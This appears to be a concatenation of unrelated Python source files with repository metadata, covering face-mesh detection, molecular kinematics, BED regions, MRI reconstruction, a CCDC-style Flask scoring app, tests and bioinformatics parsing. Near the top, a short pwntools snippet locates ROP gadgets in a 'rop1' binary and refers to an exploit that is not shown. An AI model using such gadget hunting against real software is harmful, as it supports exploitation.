| 18.583333 | 121 | 0.681614 | 72 | 446 | 4.083333 | 0.666667 | 0.040816 | 0.061224 | 0.081633 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.184 | 0.159193 | 446 | 23 | 122 | 19.391304 | 0.6 | 0.047085 | 0 | 0 | 0 | 0 | 0.07565 | 0 | 0 | 0 | 0.153664 | 0 | 0 | 1 | 0 | false | 0 | 0.133333 | 0 | 0.133333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
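A hedged sketch of how the hard-coded gadget addresses above could be rediscovered with pwntools, assuming a copy of the rop1 binary is available locally:

from pwn import ELF, ROP

elf = ELF('./rop1')
rop = ROP(elf)
# Each lookup should resolve to one of the addresses hard-coded in the exploit.
print(rop.find_gadget(['pop rdi', 'ret']))
print(rop.find_gadget(['pop rsi', 'ret']))
print(rop.find_gadget(['syscall']))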
e7541e90aae6724fc21be662cfca2ab9529171ad | 3,548 | py | Python | jikanvision/FaceMeshModule.py | JikanDev/jikanvision | 09cd4ecdbfe6423cdf2c6f4ae064fcafae576eb0 | [
"Apache-2.0"
] | 1 | 2021-09-02T09:03:53.000Z | 2021-09-02T09:03:53.000Z | jikanvision/FaceMeshModule.py | JikanDev/jikanvision | 09cd4ecdbfe6423cdf2c6f4ae064fcafae576eb0 | [
"Apache-2.0"
] | 1 | 2021-10-21T14:50:06.000Z | 2021-10-21T14:50:06.000Z | jikanvision/FaceMeshModule.py | JikanDev/jikanvision | 09cd4ecdbfe6423cdf2c6f4ae064fcafae576eb0 | [
"Apache-2.0"
] | null | null | null | """
Face Mesh Module
By : JikanDev
Website : https://jikandev.xyz/
"""
import cv2
import mediapipe as mp
class FaceMeshDetector():
"""
Find 468 Landmarks using the mediapipe library. Exports the landmarks in pixel format.
"""
def __init__(self, mode=False, maxFaces=1, refine_lm=False, minDetectCon=0.5, minTrackCon=0.5):
"""
:param mode: In static mode, detection is done on each image: slower.
:param maxFaces: Maximum number of faces to detect.
:param refine_lm: Whether to further refine the landmark coordinates
around the eyes and lips, and output additional landmarks around the
irises.
:param minDetectCon: Minimum Detection Confidence Threshold.
:param minTrackCon: Minimum Tracking Confidence Threshold.
"""
self.mode = mode
self.maxFaces = maxFaces
self.refine_lm = refine_lm
self.minDetectCon = minDetectCon
self.minTrackCon = minTrackCon
self.mpDraw = mp.solutions.drawing_utils
self.mpDrawingStyles = mp.solutions.drawing_styles
self.faceMesh = mp.solutions.face_mesh
self.meshDetection = self.faceMesh.FaceMesh(mode, maxFaces, refine_lm, minDetectCon, minTrackCon)
def findFaces(self, img, draw=True, drawTesselation=True):
"""
Find faces in an image and return the bbox info
:param img: Image to find the faces in.
:param draw: Flag to draw the output contours of the mesh on the image.
        :param drawTesselation: Flag to draw the output tessellation of the mesh on the image.
:return: Image with or without drawings.
"""
imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
self.results = self.meshDetection.process(imgRGB)
allFaces = []
h, w, c = img.shape
if self.results.multi_face_landmarks:
for faceLms in self.results.multi_face_landmarks:
myMesh = {}
mylmList = []
for id, lm in enumerate(faceLms.landmark):
px, py = int(lm.x * w), int(lm.y * h)
mylmList.append([px, py])
myMesh["lmList"] = mylmList
if draw:
self.mpDraw.draw_landmarks(img, faceLms, self.faceMesh.FACEMESH_CONTOURS, None)
if drawTesselation:
self.mpDraw.draw_landmarks(img, faceLms, self.faceMesh.FACEMESH_TESSELATION, None,
self.mpDrawingStyles.get_default_face_mesh_tesselation_style())
allFaces.append(myMesh)
return allFaces, img
def main():
"""
Example code to use the module.
"""
cap = cv2.VideoCapture(0) # Get your camera
detector = FaceMeshDetector() # Call the FaceMeshDetector class
while True:
success, img = cap.read() # If success, img = read your camera image
meshes, img = detector.findFaces(img) # meshes & img call the findFaces() function of FaceMeshDetector
if meshes:
# Mesh 1
mesh1 = meshes[0]
lmList1 = mesh1["lmList"] # List of 21 Landmark points
if len(meshes) == 2:
# Mesh 2
mesh2 = meshes[1]
lmList2 = mesh2["lmList"] # List of 21 Landmark points
cv2.imshow("Face Mesh Module", img)
cv2.waitKey(1)
if __name__ == "__main__":
main() | 35.48 | 112 | 0.592728 | 397 | 3,548 | 5.211587 | 0.375315 | 0.019333 | 0.029 | 0.012566 | 0.143064 | 0.096665 | 0.051232 | 0.051232 | 0.051232 | 0 | 0 | 0.013389 | 0.326381 | 3,548 | 100 | 113 | 35.48 | 0.852301 | 0.303551 | 0 | 0 | 0 | 0 | 0.019074 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.061224 | false | 0 | 0.040816 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e756f3d909ed9cf27d6e6754f6228111304c2edd | 6,728 | py | Python | cellpack/mgl_tools/mglutil/math/kinematics.py | mesoscope/cellpack | ec6b736fc706c1fae16392befa814b5337a3a692 | [
"MIT"
] | null | null | null | cellpack/mgl_tools/mglutil/math/kinematics.py | mesoscope/cellpack | ec6b736fc706c1fae16392befa814b5337a3a692 | [
"MIT"
] | 21 | 2021-10-02T00:07:05.000Z | 2022-03-30T00:02:10.000Z | cellpack/mgl_tools/mglutil/math/kinematics.py | mesoscope/cellpack | ec6b736fc706c1fae16392befa814b5337a3a692 | [
"MIT"
] | null | null | null | ## Automatically adapted for numpy.oldnumeric Jul 23, 2007 by
#
# Last modified on Mon Oct 15 15:33:49 PDT 2001 by lindy
#
# $Header: /opt/cvs/python/packages/share1.5/mglutil/math/kinematics.py,v 1.16 2007/07/24 17:30:40 vareille Exp $
#
"""kinematics.py - kinematic manipulation of chains of points
All transformations happen in the local coordinate space.
The refCoords supplied to the constructor and returned by the object
are local to the object. Clients should handle putting the points into
world coordinates (using translation, orientation, and origin).
"""
# from mglutil.math.ncoords import Ncoords
from mglutil.math.rotax import rotax
import numpy.oldnumeric as Numeric, math
class Kinematics:
rads_per_degree = Numeric.pi / 180.0
def __init__(self, allAtomsCoords, torTree, tolist=1):
"""refCoords is an nx3 list of n points
resultCoords is set up and maintained as homogeneous coords
"""
self.allAtomsCoords = allAtomsCoords
self.torTree = torTree
def __applyTorsion(self, node, parent_mtx):
"""Transform the subtree rooted at node.
The new torsion angle must be pre-set.
Children of the node are transformed recursively.
"""
# get rotation matrix for node
# my_mtx = self.rotax(node)
mtx = rotax(
Numeric.array(node.a.coords),
Numeric.array(node.b.coords),
node.angle * self.rads_per_degree,
transpose=1,
)
# node_mtx = Numeric.dot(parent_mtx, mtx)
node_mtx = self.mult4_3Mat(parent_mtx, mtx)
# set-up for the transformation
mm11 = node_mtx[0][0]
mm12 = node_mtx[0][1]
mm13 = node_mtx[0][2]
mm21 = node_mtx[1][0]
mm22 = node_mtx[1][1]
mm23 = node_mtx[1][2]
mm31 = node_mtx[2][0]
mm32 = node_mtx[2][1]
mm33 = node_mtx[2][2]
mm41 = node_mtx[3][0]
mm42 = node_mtx[3][1]
mm43 = node_mtx[3][2]
atomSet = node.atomSet
# transform the coordinates for the node
for i in node.atomRange:
x, y, z = node.coords[i][:3] # get origin-subtracted originals
c = atomSet[i].coords
c[0] = x * mm11 + y * mm21 + z * mm31 + mm41
c[1] = x * mm12 + y * mm22 + z * mm32 + mm42
c[2] = x * mm13 + y * mm23 + z * mm33 + mm43
# recurse through children
for child in node.children:
self.__applyTorsion(child, node_mtx)
def applyAngList(self, angList, mtx):
""""""
# pre-set the torsion angles
self.torTree.setTorsionAngles(angList)
# set-up for the transformation
mm11 = mtx[0][0]
mm12 = mtx[0][1]
mm13 = mtx[0][2]
mm21 = mtx[1][0]
mm22 = mtx[1][1]
mm23 = mtx[1][2]
mm31 = mtx[2][0]
mm32 = mtx[2][1]
mm33 = mtx[2][2]
mm41 = mtx[3][0]
mm42 = mtx[3][1]
mm43 = mtx[3][2]
root = self.torTree.rootNode
atomSet = root.atomSet
# transform the coordinates for the node
for i in root.atomRange:
x, y, z = root.coords[i][:3]
c = atomSet[i].coords
c[0] = x * mm11 + y * mm21 + z * mm31 + mm41
c[1] = x * mm12 + y * mm22 + z * mm32 + mm42
c[2] = x * mm13 + y * mm23 + z * mm33 + mm43
# traverse children of rootNode
for child in root.children:
self.__applyTorsion(child, mtx)
def mult4_3Mat(self, m1, m2):
ma11 = m1[0][0]
ma12 = m1[0][1]
ma13 = m1[0][2]
ma21 = m1[1][0]
ma22 = m1[1][1]
ma23 = m1[1][2]
ma31 = m1[2][0]
ma32 = m1[2][1]
ma33 = m1[2][2]
ma41 = m1[3][0]
ma42 = m1[3][1]
ma43 = m1[3][2]
mb11 = m2[0][0]
mb12 = m2[0][1]
mb13 = m2[0][2]
mb21 = m2[1][0]
mb22 = m2[1][1]
mb23 = m2[1][2]
mb31 = m2[2][0]
mb32 = m2[2][1]
mb33 = m2[2][2]
mb41 = m2[3][0]
mb42 = m2[3][1]
mb43 = m2[3][2]
# first line of resulting matrix
val1 = ma11 * mb11 + ma12 * mb21 + ma13 * mb31
val2 = ma11 * mb12 + ma12 * mb22 + ma13 * mb32
val3 = ma11 * mb13 + ma12 * mb23 + ma13 * mb33
result = [[val1, val2, val3, 0.0]]
# second line of resulting matrix
val1 = ma21 * mb11 + ma22 * mb21 + ma23 * mb31
val2 = ma21 * mb12 + ma22 * mb22 + ma23 * mb32
val3 = ma21 * mb13 + ma22 * mb23 + ma23 * mb33
result.append([val1, val2, val3, 0.0])
# third line of resulting matrix
val1 = ma31 * mb11 + ma32 * mb21 + ma33 * mb31
val2 = ma31 * mb12 + ma32 * mb22 + ma33 * mb32
val3 = ma31 * mb13 + ma32 * mb23 + ma33 * mb33
result.append([val1, val2, val3, 0.0])
# fourth line of resulting matrix
val1 = ma41 * mb11 + ma42 * mb21 + ma43 * mb31 + mb41
val2 = ma41 * mb12 + ma42 * mb22 + ma43 * mb32 + mb42
val3 = ma41 * mb13 + ma42 * mb23 + ma43 * mb33 + mb43
result.append([val1, val2, val3, 1.0])
return result
def rotax(self, node):
"""
Build 4x4 matrix of clockwise rotation about axis a-->b
by angle tau (radians).
a and b are numeric arrys of floats of shape (3,)
Result is a homogenous 4x4 transformation matrix.
NOTE: This has been changed by Brian, 8/30/01: rotax now returns
the rotation matrix, _not_ the transpose. This is to get
consistency across rotax, mat_to_quat and the classes in
transformation.py
"""
tau = node.angle * self.rads_per_degree
ct = math.cos(tau)
ct1 = 1.0 - ct
st = math.sin(tau)
v = node.torUnitVector
rot = Numeric.zeros((4, 4), "f")
# Compute 3x3 rotation matrix
v2 = v * v
v3 = (1.0 - v2) * ct
rot[0][0] = v2[0] + v3[0]
rot[1][1] = v2[1] + v3[1]
rot[2][2] = v2[2] + v3[2]
rot[3][3] = 1.0
v2 = v * st
rot[1][0] = v[0] * v[1] * ct1 - v2[2]
rot[2][1] = v[1] * v[2] * ct1 - v2[0]
rot[0][2] = v[2] * v[0] * ct1 - v2[1]
rot[0][1] = v[0] * v[1] * ct1 + v2[2]
rot[1][2] = v[1] * v[2] * ct1 + v2[0]
rot[2][0] = v[2] * v[0] * ct1 + v2[1]
# add translation
a = node.torBase.coords
print((" torBase (%2d) %4f, %4f, %4f:" % (node.bond[0], a[0], a[1], a[2])))
for i in (0, 1, 2):
rot[3][i] = a[i]
for j in (0, 1, 2):
rot[3][i] = rot[3][i] - rot[j][i] * a[j]
rot[i][3] = 0.0
return rot
| 32.191388 | 113 | 0.522889 | 983 | 6,728 | 3.537131 | 0.255341 | 0.032212 | 0.017256 | 0.024159 | 0.186368 | 0.146678 | 0.115042 | 0.103538 | 0.071326 | 0.071326 | 0 | 0.13899 | 0.346611 | 6,728 | 208 | 114 | 32.346154 | 0.651956 | 0.254162 | 0 | 0.076923 | 0 | 0 | 0.006804 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | false | 0 | 0.015385 | 0 | 0.084615 | 0.007692 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
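As an aside, `mult4_3Mat` above hand-unrolls the product of two affine 4x4 matrices whose last column is (0, 0, 0, 1)^T, in the row-vector convention (translation stored in row 4). A minimal NumPy sketch of the same operation under that assumption:

import numpy as np

def mult4_3(m1, m2):
    # Equivalent to Kinematics.mult4_3Mat when both inputs have
    # last column (0, 0, 0, 1)^T: a plain matrix product.
    return np.asarray(m1) @ np.asarray(m2)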
e7584bf56075da23dbb46430a6950a9f3d4405c0 | 2,178 | py | Python | ucsc_genomes_downloader/utils/expand_bed_regions.py | LucaCappelletti94/ucsc_genomes_downloader | fdef5fae76a78606279aa3e49e0b009a1b34a436 | [
"MIT"
] | 5 | 2020-01-30T15:03:40.000Z | 2022-01-25T18:44:16.000Z | ucsc_genomes_downloader/utils/expand_bed_regions.py | LucaCappelletti94/ucsc_genomes_downloader | fdef5fae76a78606279aa3e49e0b009a1b34a436 | [
"MIT"
] | 2 | 2020-01-04T15:22:16.000Z | 2020-07-16T20:02:42.000Z | ucsc_genomes_downloader/utils/expand_bed_regions.py | LucaCappelletti94/ucsc_genomes_downloader | fdef5fae76a78606279aa3e49e0b009a1b34a436 | [
"MIT"
] | 3 | 2019-12-29T15:19:22.000Z | 2021-03-27T03:05:51.000Z | import pandas as pd
import numpy as np
__all__ = ["expand_bed_regions"]
def expand_bed_regions(bed: pd.DataFrame, window_size: int, alignment: str = "center") -> pd.DataFrame:
"""Return pandas dataframe setting regions to given window size considering given alignment.
Parameters
-----------------------
bed: pd.DataFrame,
Pandas dataframe in bed-like format.
window_size: int,
Target window size.
alignment: str,
Alignment to use for generating windows.
The alignment can be either "left", "right" or "center".
        Left alignment expands on the right, keeping the left position fixed.
        Right alignment expands on the left, keeping the right position fixed.
        Center alignment expands on both sides equally, keeping the center position fixed.
Default is center.
Comments
-----------------------
For enhancers peaks usually one should generally use center alignment,
while when working on promoters peaks either right or left alignment
should be used depending on the strand, respectively for positive (right)
and negative (left) strand.
Raises
-----------------------
ValueError,
If given window size is non positive.
ValueError,
When given alignment is not supported.
Returns
-----------------------
    Returns a pandas DataFrame in bed-like format containing the expanded regions.
"""
if not isinstance(window_size, int) or window_size < 1:
raise ValueError("Window size must be a positive integer.")
if alignment == "left":
bed.chromEnd = bed.chromStart + window_size
elif alignment == "right":
bed.chromStart = bed.chromEnd - window_size
elif alignment == "center":
mid_point = (bed.chromEnd + bed.chromStart)//2
bed.chromStart = (mid_point - np.floor(window_size/2)).astype(int)
bed.chromEnd = (mid_point + np.ceil(window_size/2)).astype(int)
else:
raise ValueError((
"Invalid alignment parameter {alignment}. "
"Supported values are: left, right or center."
).format(alignment=alignment))
return bed
| 36.915254 | 103 | 0.649219 | 263 | 2,178 | 5.304183 | 0.365019 | 0.086022 | 0.027957 | 0.028674 | 0.071685 | 0.043011 | 0 | 0 | 0 | 0 | 0 | 0.002415 | 0.239669 | 2,178 | 58 | 104 | 37.551724 | 0.839976 | 0.522957 | 0 | 0 | 0 | 0 | 0.177948 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05 | false | 0 | 0.1 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
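A minimal usage sketch; the import path is assumed from the repository layout, and the column names follow the bed convention the function relies on:

import pandas as pd
from ucsc_genomes_downloader.utils import expand_bed_regions  # assumed import path

bed = pd.DataFrame({
    "chrom": ["chr1", "chr1"],
    "chromStart": [1000, 5000],
    "chromEnd": [1010, 5020],
})
# Each region now spans exactly 100 bases around its original midpoint.
expanded = expand_bed_regions(bed, window_size=100, alignment="center")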
e7593ec909d2ec472ea74ef88d48fb12c9f615bd | 2,972 | py | Python | examples/mri/non_cartesian_reconstruction.py | LElgueddari/pisap | ddd9f9f02dcd629b5615fa571ac7795c2d5e9727 | [
"CECILL-B"
] | null | null | null | examples/mri/non_cartesian_reconstruction.py | LElgueddari/pisap | ddd9f9f02dcd629b5615fa571ac7795c2d5e9727 | [
"CECILL-B"
] | null | null | null | examples/mri/non_cartesian_reconstruction.py | LElgueddari/pisap | ddd9f9f02dcd629b5615fa571ac7795c2d5e9727 | [
"CECILL-B"
] | 1 | 2018-12-04T14:32:15.000Z | 2018-12-04T14:32:15.000Z | """
Neuroimaging non-cartesian reconstruction
=========================================
Author: Chaithya G R
In this tutorial we will reconstruct an MRI image from non-cartesian kspace
measurements.
Import neuroimaging data
------------------------
We use the toy datasets available in pysap, more specifically a 2D brain slice
and a non-cartesian (radial) acquisition scheme.
"""
# Package import
from mri.numerics.fourier import NFFT
from mri.numerics.reconstruct import sparse_rec_fista
from mri.numerics.utils import generate_operators
from mri.numerics.utils import convert_locations_to_mask
from mri.parallel_mri.extract_sensitivity_maps import \
gridded_inverse_fourier_transform_nd
import pysap
from pysap.data import get_sample_data
# Third party import
from modopt.math.metrics import ssim
import numpy as np
# Loading input data
image = get_sample_data('2d-mri')
# Obtain MRI non-cartesian mask
radial_mask = get_sample_data("mri-radial-samples")
kspace_loc = radial_mask.data
mask = pysap.Image(data=convert_locations_to_mask(kspace_loc, image.shape))
# View Input
# image.show()
# mask.show()
#############################################################################
# Generate the kspace
# -------------------
#
# From the 2D brain slice and the acquisition mask, we retrospectively
# undersample the k-space using a radial acquisition mask
# We then reconstruct the zero order solution as a baseline
# Get the locations of the kspace samples and the associated observations
fourier_op = NFFT(samples=kspace_loc, shape=image.shape)
kspace_obs = fourier_op.op(image.data)
# Gridded solution
grid_space = np.linspace(-0.5, 0.5, num=image.shape[0])
grid2D = np.meshgrid(grid_space, grid_space)
grid_soln = gridded_inverse_fourier_transform_nd(kspace_loc, kspace_obs,
tuple(grid2D), 'linear')
image_rec0 = pysap.Image(data=grid_soln)
# image_rec0.show()
base_ssim = ssim(image_rec0, image)
print('The Base SSIM is : ' + str(base_ssim))
#############################################################################
# FISTA optimization
# ------------------
#
# We now want to refine the zero order solution using a FISTA optimization.
# The cost function is set to Proximity Cost + Gradient Cost
# Generate operators
gradient_op, linear_op, prox_op, cost_op = generate_operators(
data=kspace_obs,
wavelet_name="sym8",
samples=kspace_loc,
mu=6 * 1e-7,
nb_scales=4,
non_cartesian=True,
uniform_data_shape=image.shape,
gradient_space="synthesis")
# Start the FISTA reconstruction
max_iter = 200
x_final, costs, metrics = sparse_rec_fista(
gradient_op=gradient_op,
linear_op=linear_op,
prox_op=prox_op,
cost_op=cost_op,
lambda_init=1.0,
max_nb_of_iter=max_iter,
atol=1e-4,
verbose=1)
image_rec = pysap.Image(data=np.abs(x_final))
# image_rec.show()
recon_ssim = ssim(image_rec, image)
print('The Reconstruction SSIM is : ' + str(recon_ssim))
| 30.326531 | 78 | 0.694482 | 410 | 2,972 | 4.834146 | 0.356098 | 0.017659 | 0.030272 | 0.015136 | 0.113017 | 0.029263 | 0 | 0 | 0 | 0 | 0 | 0.01024 | 0.145693 | 2,972 | 97 | 79 | 30.639175 | 0.770382 | 0.354307 | 0 | 0 | 0 | 0 | 0.05248 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0.044444 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e75b23de02a67ea7c8d05abe2bf178f7d08eb2d7 | 1,857 | py | Python | triassic_scoring.py | SouthwestCCDC/2019-pcc | a2a38cfd0eb714fc9b2c0e69484171306eca67e0 | [
"Unlicense"
] | 1 | 2022-01-14T18:04:20.000Z | 2022-01-14T18:04:20.000Z | triassic_scoring.py | wrharding/triassic_shell | 2d13f8299c01a050d230034d2d37e0e3af8e1a02 | [
"Unlicense"
] | null | null | null | triassic_scoring.py | wrharding/triassic_shell | 2d13f8299c01a050d230034d2d37e0e3af8e1a02 | [
"Unlicense"
] | 1 | 2021-01-22T23:03:29.000Z | 2021-01-22T23:03:29.000Z | import sys
import logging
import socket
import argparse
import json
import os
import data_model
from flask import Flask
app = Flask(__name__)
app.secret_key = 'NpaguVKgv<;f;i(:T>3tn~dsOue5Vy)'
@app.route('/degrade/<int:index>/')
def degrade_segment(index):
if index >= 97 or index < 0:
return 'bad'
else:
data_model.load_from_disk()
node = list(data_model.fence_segments.values())[index]
node.state -= 0.067
data_model.save_to_disk()
return 'done'
@app.route('/fence/<string:dinosaur>/<int:percent>/')
def exhibit_contained(dinosaur,percent):
if dinosaur not in ['velociraptor', 'tyrannosaurus', 'guaibasaurus', 'triceratops', 'all']:
return 'error'
all_exhibits = set()
fence_sections = {}
data_model.load_from_disk()
for id,node in data_model.fence_segments.items():
all_exhibits.add(node.dinosaur)
fence_sections[id] = node
number_up = 0
total_number = 0
for section in fence_sections.values():
if dinosaur == 'all' or section.dinosaur == dinosaur:
total_number += 1
if section.state >= 0.3:
number_up += 1
percent_up = int(100 * (float(number_up)/float(total_number)))
if percent_up >= percent:
return 'up'
else:
return 'down'
def main():
parser = argparse.ArgumentParser(prog='triassic_scoring.py')
parser.add_argument('-f', '--file', help="Path to the ZODB persistence file to use.")
parser.add_argument('-a', '--address', default='0.0.0.0', dest='host')
parser.add_argument('-p', '--port', default='5000', dest='port')
args = parser.parse_args()
# Initialize the database, if needed.
data_model.init_db(args.file if args.file else None)
app.run(host=args.host, port=args.port)
if __name__ == "__main__":
main()
| 26.913043 | 95 | 0.645665 | 249 | 1,857 | 4.618474 | 0.429719 | 0.054783 | 0.044348 | 0.029565 | 0.036522 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017869 | 0.216478 | 1,857 | 68 | 96 | 27.308824 | 0.772509 | 0.018848 | 0 | 0.076923 | 0 | 0 | 0.152198 | 0.05 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057692 | false | 0 | 0.153846 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
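A hedged sketch of exercising the two routes once the scorer is running; the host and port are the argparse defaults above, and the `requests` dependency is an assumption:

import requests

BASE = "http://127.0.0.1:5000"
# Degrade fence segment 12 by one step (0.067 of its state).
print(requests.get(BASE + "/degrade/12/").text)              # 'done' or 'bad'
# Is at least 80% of the velociraptor fence still up?
print(requests.get(BASE + "/fence/velociraptor/80/").text)   # 'up', 'down' or 'error'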
e765fb3f3635f387b5b8188b7acfcdc41c6bffec | 894 | py | Python | test/test_substitution.py | corneliusroemer/pyro-cov | 54e89d128293f9ff9e995c442f72fa73f5f99b76 | [
"Apache-2.0"
] | 22 | 2021-09-14T04:33:11.000Z | 2022-02-01T21:33:05.000Z | test/test_substitution.py | corneliusroemer/pyro-cov | 54e89d128293f9ff9e995c442f72fa73f5f99b76 | [
"Apache-2.0"
] | 7 | 2021-11-02T13:48:35.000Z | 2022-03-23T18:08:35.000Z | test/test_substitution.py | corneliusroemer/pyro-cov | 54e89d128293f9ff9e995c442f72fa73f5f99b76 | [
"Apache-2.0"
] | 6 | 2021-09-18T01:06:51.000Z | 2022-01-10T02:22:06.000Z | # Copyright Contributors to the Pyro-Cov project.
# SPDX-License-Identifier: Apache-2.0
import pyro.poutine as poutine
import pytest
import torch
from pyro.infer.autoguide import AutoDelta
from pyrocov.substitution import GeneralizedTimeReversible, JukesCantor69
@pytest.mark.parametrize("Model", [JukesCantor69, GeneralizedTimeReversible])
def test_matrix_exp(Model):
model = Model()
guide = AutoDelta(model)
guide()
trace = poutine.trace(guide).get_trace()
t = torch.randn(10).exp()
with poutine.replay(trace=trace):
m = model()
assert torch.allclose(model(), m)
exp_mt = (m * t[:, None, None]).matrix_exp()
actual = model.matrix_exp(t)
assert torch.allclose(actual, exp_mt, atol=1e-6)
actual = model.log_matrix_exp(t)
log_exp_mt = exp_mt.log()
assert torch.allclose(actual, log_exp_mt, atol=1e-6)
| 29.8 | 77 | 0.694631 | 118 | 894 | 5.144068 | 0.432203 | 0.041186 | 0.093904 | 0.082372 | 0.039539 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016598 | 0.191275 | 894 | 29 | 78 | 30.827586 | 0.82296 | 0.092841 | 0 | 0 | 0 | 0 | 0.006188 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 1 | 0.047619 | false | 0 | 0.238095 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7666c41475df3a201f3e9500fe80142589cab4b | 438 | py | Python | angr/engines/vex/expressions/unsupported.py | aeflores/angr | ac85a3f168375ed0ee20551b1b716c1bff4ac02b | [
"BSD-2-Clause"
] | 1 | 2020-11-18T16:39:11.000Z | 2020-11-18T16:39:11.000Z | angr/engines/vex/expressions/unsupported.py | aeflores/angr | ac85a3f168375ed0ee20551b1b716c1bff4ac02b | [
"BSD-2-Clause"
] | 1 | 2019-04-08T12:10:07.000Z | 2019-04-08T12:10:07.000Z | angr/engines/vex/expressions/unsupported.py | aeflores/angr | ac85a3f168375ed0ee20551b1b716c1bff4ac02b | [
"BSD-2-Clause"
] | 1 | 2020-11-18T16:39:13.000Z | 2020-11-18T16:39:13.000Z | import logging
l = logging.getLogger(name=__name__)
def SimIRExpr_Unsupported(_engine, state, expr):
l.error("Unsupported IRExpr %s. Please implement.", type(expr).__name__)
size = expr.result_size(state.scratch.tyenv)
result = state.solver.Unconstrained(type(expr).__name__, size)
state.history.add_event('resilience', resilience_type='irexpr', expr=type(expr).__name__, message='unsupported irexpr')
return result
| 39.818182 | 123 | 0.755708 | 55 | 438 | 5.636364 | 0.527273 | 0.077419 | 0.116129 | 0.103226 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.116438 | 438 | 10 | 124 | 43.8 | 0.801034 | 0 | 0 | 0 | 0 | 0 | 0.16895 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e76781753c0e4a869e70caddd34d8e8a1557bef1 | 5,090 | py | Python | bifrost_whats_my_species/datadump.py | ssi-dk/bifrost_whats_my_species | fe59e8cf096b8622747278959d53a95c80bed9ad | [
"MIT"
] | null | null | null | bifrost_whats_my_species/datadump.py | ssi-dk/bifrost_whats_my_species | fe59e8cf096b8622747278959d53a95c80bed9ad | [
"MIT"
] | 2 | 2020-11-13T13:46:11.000Z | 2020-11-20T08:36:55.000Z | bifrost_whats_my_species/datadump.py | ssi-dk/bifrost-whats_my_species | fe59e8cf096b8622747278959d53a95c80bed9ad | [
"MIT"
] | null | null | null | from bifrostlib import common
from bifrostlib.datahandling import Sample
from bifrostlib.datahandling import SampleComponentReference
from bifrostlib.datahandling import SampleComponent
from bifrostlib.datahandling import Category
from typing import Dict
import os
def extract_bracken_txt(species_detection: Category, results: Dict, component_name: str) -> None:
file_name = "bracken.txt"
file_key = common.json_key_cleaner(file_name)
file_path = os.path.join(component_name, file_name)
results[file_key] = {}
with open(file_path, "r") as fh:
buffer = fh.readlines()
number_of_entries = min(len(buffer) - 1, 2)
if number_of_entries > 0: # skip first line as it's header
for i in range(1, 1 + number_of_entries): # skip first line as it's header
results[file_key]["species_" + str(i) + "_name"] = buffer[i].split("\t")[0]
results[file_key]["species_" + str(i) + "_kraken_assigned_reads"] = buffer[i].split("\t")[3]
results[file_key]["species_" + str(i) + "_added_reads"] = buffer[i].split("\t")[4]
results[file_key]["species_" + str(i) + "_count"] = int(buffer[i].split("\t")[5].strip())
def extract_kraken_report_bracken_txt(species_detection: Category, results: Dict, component_name: str) -> None:
file_name = "kraken_report_bracken.txt"
file_key = common.json_key_cleaner(file_name)
file_path = os.path.join(component_name, file_name)
results[file_key] = {}
with open(file_path, "r") as fh:
buffer = fh.readlines()
if len(buffer) > 2:
results[file_key]["unclassified_count"] = int(buffer[0].split("\t")[1])
results[file_key]["root"] = int(buffer[1].split("\t")[1])
def species_math(species_detection: Category, results: Dict, component_name: str) -> None:
